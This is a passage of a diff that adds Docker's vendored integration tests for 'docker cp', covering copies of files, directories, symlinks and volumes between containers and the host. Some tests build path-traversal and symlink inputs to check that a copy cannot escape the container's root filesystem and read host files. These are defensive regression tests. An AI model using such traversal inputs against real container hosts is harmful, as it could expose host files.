c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + // unable to make dstDir + c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "dir2") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go new file mode 100644 index 0000000000..4e5c39e998 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go @@ -0,0 +1,660 @@ +package main + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +const ( + cpTestPathParent = "/some" + cpTestPath = "/some/path" + cpTestName = "test" + cpFullPath = "/some/path/test" + + cpContainerContents = "holla, i am the container" + cpHostContents = "hello, i am the host" +) + +// Ensure that an all-local path case returns an error. +func (s *DockerSuite) TestCpLocalOnly(c *check.C) { + err := runDockerCp(c, "foo", "bar") + c.Assert(err, checker.NotNil) + + c.Assert(err.Error(), checker.Contains, "must specify at least one container source") +} + +// Test for #5656 +// Check that garbage paths don't escape the container's rootfs +func (s *DockerSuite) TestCpGarbagePath(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + path := path.Join("../../../../../../../../../../../../", cpFullPath) + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- garbage path can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for garbage path + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Check that relative paths are relative to the container's rootfs +func (s *DockerSuite) TestCpRelativePath(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + var relPath string + if path.IsAbs(cpFullPath) { + // normally this is `filepath.Rel("/", cpFullPath)` but we cannot + // get this unix-path manipulation on windows with filepath. + relPath = cpFullPath[1:] + } + c.Assert(path.IsAbs(cpFullPath), checker.True, check.Commentf("path %s was assumed to be an absolute path", cpFullPath)) + + dockerCmd(c, "cp", containerID+":"+relPath, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- relative path can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for relative path + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Check that absolute paths are relative to the container's rootfs +func (s *DockerSuite) TestCpAbsolutePath(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + path := cpFullPath + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- absolute path can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for absolute path + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Test for #5619 +// Check that absolute symlinks are still relative to the container's rootfs +func (s *DockerSuite) TestCpAbsoluteSymlink(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpFullPath+" container_path") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, "container_path") + defer os.RemoveAll(tmpdir) + + path := path.Join("/", "container_path") + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + // We should have copied a symlink *NOT* the file itself! + linkTarget, err := os.Readlink(tmpname) + c.Assert(err, checker.IsNil) + + c.Assert(linkTarget, checker.Equals, filepath.FromSlash(cpFullPath)) +} + +// Check that symlinks to a directory behave as expected when copying one from +// a container. +func (s *DockerSuite) TestCpFromSymlinkToDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpTestPathParent+" /dir_link") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + testDir, err := ioutil.TempDir("", "test-cp-from-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testDir) + + // This copy command should copy the symlink, not the target, into the + // temporary directory. + dockerCmd(c, "cp", containerID+":"+"/dir_link", testDir) + + expectedPath := filepath.Join(testDir, "dir_link") + linkTarget, err := os.Readlink(expectedPath) + c.Assert(err, checker.IsNil) + + c.Assert(linkTarget, checker.Equals, filepath.FromSlash(cpTestPathParent)) + + os.Remove(expectedPath) + + // This copy command should resolve the symlink (note the trailing + // separator), copying the target into the temporary directory. + dockerCmd(c, "cp", containerID+":"+"/dir_link/", testDir) + + // It *should not* have copied the directory using the target's name, but + // used the given name instead. + unexpectedPath := filepath.Join(testDir, cpTestPathParent) + stat, err := os.Lstat(unexpectedPath) + if err == nil { + out = fmt.Sprintf("target name was copied: %q - %q", stat.Mode(), stat.Name()) + } + c.Assert(err, checker.NotNil, check.Commentf(out)) + + // It *should* have copied the directory using the asked name "dir_link". + stat, err = os.Lstat(expectedPath) + c.Assert(err, checker.IsNil, check.Commentf("unable to stat resource at %q", expectedPath)) + + c.Assert(stat.IsDir(), checker.True, check.Commentf("should have copied a directory but got %q instead", stat.Mode())) +} + +// Check that symlinks to a directory behave as expected when copying one to a +// container. +func (s *DockerSuite) TestCpToSymlinkToDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) // Requires local volume mount bind. + + testVol, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testVol) + + // Create a test container with a local volume. We will test by copying + // to the volume path in the container which we can then verify locally. + out, _ := dockerCmd(c, "create", "-v", testVol+":/testVol", "busybox") + + containerID := strings.TrimSpace(out) + + // Create a temp directory to hold a test file nested in a directory. + testDir, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testDir) + + // This file will be at "/testDir/some/path/test" and will be copied into + // the test volume later. + hostTestFilename := filepath.Join(testDir, cpFullPath) + c.Assert(os.MkdirAll(filepath.Dir(hostTestFilename), os.FileMode(0700)), checker.IsNil) + c.Assert(ioutil.WriteFile(hostTestFilename, []byte(cpHostContents), os.FileMode(0600)), checker.IsNil) + + // Now create another temp directory to hold a symlink to the + // "/testDir/some" directory. + linkDir, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(linkDir) + + // Then symlink "/linkDir/dir_link" to "/testdir/some". + linkTarget := filepath.Join(testDir, cpTestPathParent) + localLink := filepath.Join(linkDir, "dir_link") + c.Assert(os.Symlink(linkTarget, localLink), checker.IsNil) + + // Now copy that symlink into the test volume in the container. + dockerCmd(c, "cp", localLink, containerID+":/testVol") + + // This copy command should have copied the symlink *not* the target. + expectedPath := filepath.Join(testVol, "dir_link") + actualLinkTarget, err := os.Readlink(expectedPath) + c.Assert(err, checker.IsNil, check.Commentf("unable to read symlink at %q", expectedPath)) + + c.Assert(actualLinkTarget, checker.Equals, linkTarget) + + // Good, now remove that copied link for the next test. + os.Remove(expectedPath) + + // This copy command should resolve the symlink (note the trailing + // separator), copying the target into the test volume directory in the + // container. + dockerCmd(c, "cp", localLink+"/", containerID+":/testVol") + + // It *should not* have copied the directory using the target's name, but + // used the given name instead. + unexpectedPath := filepath.Join(testVol, cpTestPathParent) + stat, err := os.Lstat(unexpectedPath) + if err == nil { + out = fmt.Sprintf("target name was copied: %q - %q", stat.Mode(), stat.Name()) + } + c.Assert(err, checker.NotNil, check.Commentf(out)) + + // It *should* have copied the directory using the asked name "dir_link". + stat, err = os.Lstat(expectedPath) + c.Assert(err, checker.IsNil, check.Commentf("unable to stat resource at %q", expectedPath)) + + c.Assert(stat.IsDir(), checker.True, check.Commentf("should have copied a directory but got %q instead", stat.Mode())) + + // And this directory should contain the file copied from the host at the + // expected location: "/testVol/dir_link/path/test" + expectedFilepath := filepath.Join(testVol, "dir_link/path/test") + fileContents, err := ioutil.ReadFile(expectedFilepath) + c.Assert(err, checker.IsNil) + + c.Assert(string(fileContents), checker.Equals, cpHostContents) +} + +// Test for #5619 +// Check that symlinks which are part of the resource path are still relative to the container's rootfs +func (s *DockerSuite) TestCpSymlinkComponent(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpTestPath+" container_path") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + path := path.Join("/", "container_path", cpTestName) + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- symlink path component can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for symlink path component + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Check that cp with unprivileged user doesn't return any error +func (s *DockerSuite) TestCpUnprivilegedUser(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, UnixCli) // uses chmod/su: not available on windows + + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch "+cpTestName) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpdir) + + c.Assert(os.Chmod(tmpdir, 0777), checker.IsNil) + + result := icmd.RunCommand("su", "unprivilegeduser", "-c", + fmt.Sprintf("%s cp %s:%s %s", dockerBinary, containerID, cpTestName, tmpdir)) + result.Assert(c, icmd.Expected{}) +} + +func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) + + outDir, err := ioutil.TempDir("", "cp-test-special-files") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(outDir) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch /foo") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + // Copy actual /etc/resolv.conf + dockerCmd(c, "cp", containerID+":/etc/resolv.conf", outDir) + + expected, err := readContainerFile(containerID, "resolv.conf") + actual, err := ioutil.ReadFile(outDir + "/resolv.conf") + + // Expected copied file to be duplicate of the container resolvconf + c.Assert(bytes.Equal(actual, expected), checker.True) + + // Copy actual /etc/hosts + dockerCmd(c, "cp", containerID+":/etc/hosts", outDir) + + expected, err = readContainerFile(containerID, "hosts") + actual, err = ioutil.ReadFile(outDir + "/hosts") + + // Expected copied file to be duplicate of the container hosts + c.Assert(bytes.Equal(actual, expected), checker.True) + + // Copy actual /etc/resolv.conf + dockerCmd(c, "cp", containerID+":/etc/hostname", outDir) + + expected, err = readContainerFile(containerID, "hostname") + actual, err = ioutil.ReadFile(outDir + "/hostname") + + // Expected copied file to be duplicate of the container resolvconf + c.Assert(bytes.Equal(actual, expected), checker.True) +} + +func (s *DockerSuite) TestCpVolumePath(c *check.C) { + // stat /tmp/cp-test-volumepath851508420/test gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) + + tmpDir, err := ioutil.TempDir("", "cp-test-volumepath") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + outDir, err := ioutil.TempDir("", "cp-test-volumepath-out") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(outDir) + _, err = os.Create(tmpDir + "/test") + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "-d", "-v", "/foo", "-v", tmpDir+"/test:/test", "-v", tmpDir+":/baz", "busybox", "/bin/sh", "-c", "touch /foo/bar") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + // Copy actual volume path + dockerCmd(c, "cp", containerID+":/foo", outDir) + + stat, err := os.Stat(outDir + "/foo") + c.Assert(err, checker.IsNil) + // expected copied content to be dir + c.Assert(stat.IsDir(), checker.True) + stat, err = os.Stat(outDir + "/foo/bar") + c.Assert(err, checker.IsNil) + // Expected file `bar` to be a file + c.Assert(stat.IsDir(), checker.False) + + // Copy file nested in volume + dockerCmd(c, "cp", containerID+":/foo/bar", outDir) + + stat, err = os.Stat(outDir + "/bar") + c.Assert(err, checker.IsNil) + // Expected file `bar` to be a file + c.Assert(stat.IsDir(), checker.False) + + // Copy Bind-mounted dir + dockerCmd(c, "cp", containerID+":/baz", outDir) + stat, err = os.Stat(outDir + "/baz") + c.Assert(err, checker.IsNil) + // Expected `baz` to be a dir + c.Assert(stat.IsDir(), checker.True) + + // Copy file nested in bind-mounted dir + dockerCmd(c, "cp", containerID+":/baz/test", outDir) + fb, err := ioutil.ReadFile(outDir + "/baz/test") + c.Assert(err, checker.IsNil) + fb2, err := ioutil.ReadFile(tmpDir + "/test") + c.Assert(err, checker.IsNil) + // Expected copied file to be duplicate of bind-mounted file + c.Assert(bytes.Equal(fb, fb2), checker.True) + + // Copy bind-mounted file + dockerCmd(c, "cp", containerID+":/test", outDir) + fb, err = ioutil.ReadFile(outDir + "/test") + c.Assert(err, checker.IsNil) + fb2, err = ioutil.ReadFile(tmpDir + "/test") + c.Assert(err, checker.IsNil) + // Expected copied file to be duplicate of bind-mounted file + c.Assert(bytes.Equal(fb, fb2), checker.True) +} + +func (s *DockerSuite) TestCpToDot(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /test") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpdir) + cwd, err := os.Getwd() + c.Assert(err, checker.IsNil) + defer os.Chdir(cwd) + c.Assert(os.Chdir(tmpdir), checker.IsNil) + dockerCmd(c, "cp", containerID+":/test", ".") + content, err := ioutil.ReadFile("./test") + c.Assert(string(content), checker.Equals, "lololol\n") +} + +func (s *DockerSuite) TestCpToStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /test") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "cp", containerID+":/test", "-"), + exec.Command("tar", "-vtf", "-")) + + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Contains, "test") + c.Assert(out, checker.Contains, "-rw") +} + +func (s *DockerSuite) TestCpNameHasColon(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /te:s:t") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpdir) + dockerCmd(c, "cp", containerID+":/te:s:t", tmpdir) + content, err := ioutil.ReadFile(tmpdir + "/te:s:t") + c.Assert(string(content), checker.Equals, "lololol\n") +} + +func (s *DockerSuite) TestCopyAndRestart(c *check.C) { + testRequires(c, DaemonIsLinux) + expectedMsg := "hello" + out, _ := dockerCmd(c, "run", "-d", "busybox", "echo", expectedMsg) + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpDir, err := ioutil.TempDir("", "test-docker-restart-after-copy-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dockerCmd(c, "cp", fmt.Sprintf("%s:/etc/group", containerID), tmpDir) + + out, _ = dockerCmd(c, "start", "-a", containerID) + + c.Assert(strings.TrimSpace(out), checker.Equals, expectedMsg) +} + +func (s *DockerSuite) TestCopyCreatedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "--name", "test_cp", "-v", "/test", "busybox") + + tmpDir, err := ioutil.TempDir("", "test") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + dockerCmd(c, "cp", "test_cp:/bin/sh", tmpDir) +} + +// test copy with option `-L`: following symbol link +// Check that symlinks to a file behave as expected when copying one from +// a container to host following symbol link +func (s *DockerSuite) TestCpSymlinkFromConToHostFollowSymlink(c *check.C) { + testRequires(c, DaemonIsLinux) + out, exitCode := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpFullPath+" /dir_link") + if exitCode != 0 { + c.Fatal("failed to create a container", out) + } + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", cleanedContainerID) + if strings.TrimSpace(out) != "0" { + c.Fatal("failed to set up container", out) + } + + testDir, err := ioutil.TempDir("", "test-cp-symlink-container-to-host-follow-symlink") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(testDir) + + // This copy command should copy the symlink, not the target, into the + // temporary directory. + dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", testDir) + + expectedPath := filepath.Join(testDir, "dir_link") + + expected := []byte(cpContainerContents) + actual, err := ioutil.ReadFile(expectedPath) + + if !bytes.Equal(actual, expected) { + c.Fatalf("Expected copied file to be duplicate of the container symbol link target") + } + os.Remove(expectedPath) + + // now test copy symbol link to a non-existing file in host + expectedPath = filepath.Join(testDir, "somefile_host") + // expectedPath shouldn't exist, if exists, remove it + if _, err := os.Lstat(expectedPath); err == nil { + os.Remove(expectedPath) + } + + dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", expectedPath) + + actual, err = ioutil.ReadFile(expectedPath) + + if !bytes.Equal(actual, expected) { + c.Fatalf("Expected copied file to be duplicate of the container symbol link target") + } + defer os.Remove(expectedPath) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go new file mode 100644 index 0000000000..f981cb8f8b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go @@ -0,0 +1,599 @@ +package main + +import ( + "os" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// docker cp LOCALPATH CONTAINER:PATH + +// Try all of the test cases from the archive package which implements the +// internals of `docker cp` and ensure that the behavior matches when actually +// copying to and from containers. + +// Basic assumptions about SRC and DST: +// 1. SRC must exist. +// 2. If SRC ends with a trailing separator, it must be a directory. +// 3. DST parent directory must exist. +// 4. If DST exists as a file, it must not end with a trailing separator. + +// First get these easy error cases out of the way. + +// Test for error when SRC does not exist. +func (s *DockerSuite) TestCpToErrSrcNotExists(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{}) + + tmpDir := getTestDir(c, "test-cp-to-err-src-not-exists") + defer os.RemoveAll(tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when SRC ends in a trailing +// path separator but it exists as a file. +func (s *DockerSuite) TestCpToErrSrcNotDir(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{}) + + tmpDir := getTestDir(c, "test-cp-to-err-src-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPathTrailingSep(tmpDir, "file1") + dstPath := containerCpPath(containerID, "testDir") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) +} + +// Test for error when SRC is a valid file or directory, +// bu the DST parent directory does not exist. +func (s *DockerSuite) TestCpToErrDstParentNotExists(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-to-err-dst-parent-not-exists") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/notExists", "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = cpPath(tmpDir, "dir1") + + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when DST ends in a trailing path separator but exists as a +// file. Also test that we cannot overwrite an existing directory with a +// non-directory and cannot overwrite an existing +func (s *DockerSuite) TestCpToErrDstNotDir(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-to-err-dst-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := cpPath(tmpDir, "dir1/file1-1") + dstPath := containerCpPathTrailingSep(containerID, "file1") + + // The client should encounter an error trying to stat the destination + // and then be unable to copy since the destination is asserted to be a + // directory but does not exist. + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExist error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = cpPath(tmpDir, "dir1") + + // The client should encounter an error trying to stat the destination and + // then decide to extract to the parent directory instead with a rebased + // name in the source archive, but this directory would overwrite the + // existing file with the same name. + err = runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCannotOverwriteNonDirWithDir(err), checker.True, check.Commentf("expected CannotOverwriteNonDirWithDir error, but got %T: %s", err, err)) +} + +// Check that copying from a local path to a symlink in a container copies to +// the symlink target and does not overwrite the container symlink itself. +func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { + // stat /tmp/test-cp-to-symlink-destination-262430901/vol3 gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) // Requires local volume mount bind. + + testVol := getTestDir(c, "test-cp-to-symlink-destination-") + defer os.RemoveAll(testVol) + + makeTestContentInDir(c, testVol) + + containerID := makeTestContainer(c, testContainerOptions{ + volumes: defaultVolumes(testVol), // Our bind mount is at /vol2 + }) + + // First, copy a local file to a symlink to a file in the container. This + // should overwrite the symlink target contents with the source contents. + srcPath := cpPath(testVol, "file2") + dstPath := containerCpPath(containerID, "/vol2/symlinkToFile1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToFile1"), "file1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(testVol, "file1"), "file2\n"), checker.IsNil) + + // Next, copy a local file to a symlink to a directory in the container. + // This should copy the file into the symlink target directory. + dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(testVol, "file2"), "file2\n"), checker.IsNil) + + // Next, copy a file to a symlink to a file that does not exist (a broken + // symlink) in the container. This should create the target file with the + // contents of the source file. + dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToFileX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToFileX"), "fileX"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(testVol, "fileX"), "file2\n"), checker.IsNil) + + // Next, copy a local directory to a symlink to a directory in the + // container. This should copy the directory into the symlink target + // directory and not modify the symlink. + srcPath = cpPath(testVol, "/dir2") + dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) + + // The directory should now contain a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(testVol, "dir1/dir2/file2-1"), "file2-1\n"), checker.IsNil) + + // Next, copy a local directory to a symlink to a local directory that does + // not exist (a broken symlink) in the container. This should create the + // target as a directory with the contents of the source directory. It + // should not modify the symlink. + dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToDirX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToDirX"), "dirX"), checker.IsNil) + + // The "dirX" directory should now be a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(testVol, "dirX/file2-1"), "file2-1\n"), checker.IsNil) +} + +// Possibilities are reduced to the remaining 10 cases: +// +// case | 